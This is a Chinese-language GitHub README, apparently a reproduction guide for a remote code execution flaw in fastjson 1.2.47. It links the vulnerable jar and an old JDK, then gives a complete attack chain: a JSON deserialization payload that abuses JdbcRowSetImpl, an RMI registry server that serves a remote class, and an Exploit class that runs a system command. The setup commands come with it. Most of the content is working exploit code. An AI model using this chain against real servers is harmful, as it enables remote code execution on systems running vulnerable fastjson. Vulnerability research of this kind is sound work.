├── Fastjson.jpg └── README.md /Fastjson.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/fastjson-RCE/HEAD/Fastjson.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # fastjson-v1.2.47-RCE 漏洞复现 2 | 3 | ## fastjson-1.2.47 <== 4 | 5 | ### 资源下载: 6 | ``` 7 | 下载 http://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.47/ 8 | 文档 https://github.com/alibaba/fastjson/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98 9 | 源码 https://github.com/alibaba/fastjson/archive/1.2.47.zip 10 | 11 | jar http://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.47/fastjson-1.2.47.jar 12 | Java SE Development Kit 8u60 13 | https://download.oracle.com/otn/java/jdk/8u60-b27/jdk-8u60-windows-x64.exe 14 | ``` 15 | 16 | ![](./Fastjson.jpg) 17 | 18 | ## poc.java 19 | 20 | `{ "name ":{ "@type ": "java.lang.Class ", "val ": "com.sun.rowset.JdbcRowSetImpl "}," +" "xxxx ":{ "@type ": "com.sun.rowset.JdbcRowSetImpl ", "dataSourceName ":" +" "rmi://localhost:1099/Exploit ", "autoCommit ":true}}}` 21 | 22 | ``` 23 | import com.alibaba.fastjson.JSON; 24 | 25 | 26 | public class poc { 27 | 28 | public static void main(String[] argv) { 29 | String payload = "{\"name\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," + 30 | "\"xxxx\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":" + 31 | "\"rmi://localhost:1099/Exploit\",\"autoCommit\":true}}}"; 32 | JSON.parse(payload); 33 | } 34 | 35 | } 36 | ``` 37 | ## rmiServer.java 38 | 39 | `javac rmiServer.java` 40 | 41 | `java rmiServer` 42 | 43 | `python -m SimpleHTTPServer` 44 | 45 | ``` 46 | import com.sun.jndi.rmi.registry.ReferenceWrapper; 47 | import javax.naming.Reference; 48 | import java.rmi.registry.LocateRegistry; 49 | import java.rmi.registry.Registry; 50 | 51 | public class rmiServer { 52 | 53 | public static void main(String[] args) throws Exception { 54 | Registry registry = LocateRegistry.createRegistry(1099); 55 | Reference reference = new Reference("Exloit", 56 | "Exploit","http://localhost:8000/"); 57 | ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); 58 | registry.bind("Exploit",referenceWrapper); 59 | } 60 | } 61 | ``` 62 | 63 | 64 | ## Exploit.java 65 | 66 | `javac Exploit.java` 67 | 68 | ``` 69 | import javax.naming.Context; 70 | import javax.naming.Name; 71 | import javax.naming.spi.ObjectFactory; 72 | import java.io.IOException; 73 | import java.util.Hashtable; 74 | 75 | public class Exploit implements ObjectFactory { 76 | 77 | @Override 78 | public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) { 79 | exec("xterm"); 80 | return null; 81 | } 82 | 83 | public static String exec(String cmd) { 84 | try { 85 | Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator"); 86 | } catch (IOException e) { 87 | e.printStackTrace(); 88 | } 89 | return ""; 90 | } 91 | 92 | public static void main(String[] args) { 93 | exec("123"); 94 | } 95 | } 96 | ``` 97 | ## 参考链接 98 | 99 | https://www.03sec.com/3240.shtml 100 | 101 | 102 | --------------------------------------------------------------------------------